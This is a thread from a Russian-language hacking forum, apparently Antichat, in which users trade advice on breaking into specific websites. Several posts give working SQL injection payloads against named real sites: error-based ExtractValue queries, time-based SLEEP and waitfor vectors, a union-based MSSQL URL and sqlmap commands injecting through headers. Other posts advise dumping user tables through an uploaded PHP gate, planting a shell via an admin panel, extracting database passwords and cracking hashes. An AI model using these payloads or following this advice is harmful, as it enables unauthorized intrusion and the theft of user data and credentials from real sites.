Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Unknowhacker

    Unknowhacker Member

    Joined:
    25 May 2013
    Messages:
    256
    Likes Received:
    35
    Reputations:
    24
    ftp://site.com - доступ требует авторизацию, ЦП панель так же требует авторизацию. Ну и какой способ
     
  2. preno

    preno Member

    Joined:
    5 Sep 2010
    Messages:
    253
    Likes Received:
    6
    Reputations:
    0
    Способ на первый взгляд сработал, вектор запросов найден, timebased SQL, я дошёл до финальной стадии когда SQLmap предлагает ввести произвольный SQL запрос и выполнить его, однако он не выполняется, на любой запрос выводит none
    Пробую способ:
    ./sqlmap.py --headers="User-Agent: Mozilla/5.0 Gecko/20120101 *" -u "http://url.com/path/?id=1" --level=5 risk=3 --dbms="MySQL"
    Вектор атаки найден:
    Payload: User-Agent: Mozilla/5.0 Gecko/20120101') AND SLEEP(5)#
    Однако, в SQL иньекции фильтруются запятые, а так как я не силен в timebased векторах, то даже предположить не могу, возможно ли провести timebased атаку без запятых и выполнить грубо говоря запрос select password from user
    После найденного вектора запускаю скрипт:
    ./sqlmap.py --headers="User-Agent: Mozilla/5.0 Gecko/20120101 *" -u "http://url.com/path/?id=1" --level=5 risk=3 --dbms="MySQL" --sql-query="SELECT user()"
    Он ждет минут 5-10 в retrieved:, пытается выполнить запрос и вытащить ответ, и по истечению времени вываливает:
    SELECT user(): None
    И так на любой SQL запрос. И вот вопрос, это из за запятых невозможно провести атаку, или я что то не так делаю? Подскажите пожалуйста!
     
  3. Unknowhacker

    Unknowhacker Member

    Joined:
    25 May 2013
    Messages:
    256
    Likes Received:
    35
    Reputations:
    24
    Интересует вывод таблиц из этой инъекции:
    Code:
    http://naftogaz-europe.com
    Note: в поле поиск '
     
    #23923 Unknowhacker, 1 Mar 2015
    Last edited: 1 Mar 2015
  4. kingbeef

    kingbeef Reservists Of Antichat

    Joined:
    8 Apr 2010
    Messages:
    490
    Likes Received:
    168
    Reputations:
    126
    'or(ExtractValue(1,concat(0x3a,(select(table_name)from(information_schema.tables)limit/**/0,1))))='1
     
    _________________________
    2 people like this.
  5. MaxFast

    MaxFast Elder - Старейшина

    Joined:
    12 Oct 2011
    Messages:
    619
    Likes Received:
    148
    Reputations:
    94
    Каким образом под никсами слить огромную таблицу с юзерами? SQLMap даже не может.
     
  6. andrxx

    andrxx Banned

    Joined:
    7 Nov 2013
    Messages:
    52
    Likes Received:
    6
    Reputations:
    0
    mysqldump
     
  7. 5maks5

    5maks5 Elder - Старейшина

    Joined:
    29 Aug 2010
    Messages:
    505
    Likes Received:
    261
    Reputations:
    40
    SQLYog. PHP Gate кидаешь на хост, где mysql расположен, с компа подключаешься.
    Единственный минус - будет долго рожать.
    Базы от нескольких гб - от получаса.
    Зато валидный дамп, что не может не радовать.
     
  8. Xsite

    Xsite Member

    Joined:
    21 Jan 2010
    Messages:
    54
    Likes Received:
    5
    Reputations:
    0
    Ребят помогите советом )

    При "расковыривании" инъекций допустим тайм блинд ,скл меп ,оооочень долго дампит ,допустим 1 фразу ,слово и тд и тп. Если варианты ,слить дб при таких инъекциях быстрее ?
     
  9. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,682
    Likes Received:
    889
    Reputations:
    363
    слить быстрее через инъекцию основанную на задержках? ну не знаю :) склмап не всегда точно может определить подходящий для случая вектор, поэтому пробуйте сначала руками, и если есть другие варианты — автоматизируйте сами.
     
    _________________________
  10. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,785
    Likes Received:
    808
    Reputations:
    851
    Есть замечательный вектор превращения Time-Based в Error-Based. Работает много где.

    Могу показать, если дашь линк.
     
    _________________________
  11. grimnir

    grimnir Reservists Of Antichat

    Joined:
    23 Apr 2012
    Messages:
    1,092
    Likes Received:
    737
    Reputations:
    200
    Выковыривай админа и пробуй залить шелл через админку или если в самой админке есть сделать бэкап бд. так же не забывай про --passwords --users --hostname при удачном стечении обстоятельств можно подключиться напрямую к бд )

    2BigBear на таком получится?
    GET /registrierung/step0_vip.html HTTP/1.1
    Cookie: PHPSESSID=kk7rupflro2bf33ljdq2d5pqp0; besuchersession=*; erstzugriff=kk7rupflro2bf33ljdq2d5pqp0
    X-Requested-With: XMLHttpRequest
    Referer: http://www.-----.de:80/
    Host: www.lovepoint.de
    Connection: Keep-alive
    Accept-Encoding: gzip,deflate
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
    Accept: */*

    Вектор PHPSESSID=kk7rupflro2bf33ljdq2d5pqp0; besuchersession=') AND SLEEP(5) AND ('KgRw'='KgRw; erstzugriff=kk7rupflro2bf33ljdq2d5pqp0
     
    _________________________
    #23931 grimnir, 5 Mar 2015
    Last edited: 5 Mar 2015
  12. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,785
    Likes Received:
    808
    Reputations:
    851
    Вот пример из выше, сайт затер

    http://www.site.ru/?param=1%27+and+if(substr((select+@@version),1,1)=5,1,(select+1+union+select+2))=%271

    TRUE - нет ошибки

    http://www.site.ru/?param=1%27+and+if(substr((select+@@version),1,1)=4,1,(select+1+union+select+2))=%271

    FASLE - есть ошибка

    На этом попробуй также
     
    _________________________
    1 person likes this.
  13. DezMond™

    DezMond™ Elder - Старейшина

    Joined:
    10 Jan 2008
    Messages:
    2,434
    Likes Received:
    398
    Reputations:
    228
    http://www.cstb.fr/fileadmin/app/atec/modATEC/cpt.php?id_avi=2012319
    хелп
     
  14. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,682
    Likes Received:
    889
    Reputations:
    363
    blind-mssql
    Code:
    http://www.cstb.fr/fileadmin/app/atec/modATEC/cpt.php?id_avi=2012319%20waitfor%20delay%20%270:0:10%27--+
    union-based mssql:
    Code:
    http://www.cstb.fr/fileadmin/app/atec/modATEC/cpt.php?id_avi=-2012319%20UNION%20ALL%20SELECT%20@@version,%27lol%27--
    тыкаешь на lol, смотришь вывод
     
    _________________________
    1 person likes this.
  15. teh

    teh Member

    Joined:
    2 Dec 2010
    Messages:
    79
    Likes Received:
    6
    Reputations:
    -2
    Привет. Посоветуйте, что дальше делать если нашел на сайте phpinfo. Вроде инфа там написана, а что делать не знаю
     
  16. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,785
    Likes Received:
    808
    Reputations:
    851
    Попей чаю, посмотри фильм, познай дзен в конце концов.

    Вывод функции phpinfo() раскрывает лишь служебную информацию, такую как настройки определённых переменных и полные пути к скриптам на сайте.

    Имея только чистый phpinfo() максимум, что можно провести Reflected-XSS через URL в старых версиях.

    Обычно этот файл используется в совокупности с другими уязвимостями. И практически никогда (за исключением выше написанного) - без них.
     
    _________________________
  17. teh

    teh Member

    Joined:
    2 Dec 2010
    Messages:
    79
    Likes Received:
    6
    Reputations:
    -2
    нашел в site/info.php других уязвимостей не нашел. спасибо
    А если хеш пароля не могу рашифровать онлайн, как еще можно разшифровать?
     
  18. usasoft

    usasoft Member

    Joined:
    29 Sep 2007
    Messages:
    106
    Likes Received:
    22
    Reputations:
    6
    еще использовать программы для расшифровки, такие как hashcat, jtr, egb
     
  19. teh

    teh Member

    Joined:
    2 Dec 2010
    Messages:
    79
    Likes Received:
    6
    Reputations:
    -2
    Еще одни вопрос. Нашел я на сайте папку manual -> site/manual/ здесь что то про apache. Можно что то вытащить?
     
  20. kingbeef

    kingbeef Reservists Of Antichat

    Joined:
    8 Apr 2010
    Messages:
    490
    Likes Received:
    168
    Reputations:
    126
    Нет!
     
    _________________________
Loading...
Thread Status:
Not open for further replies.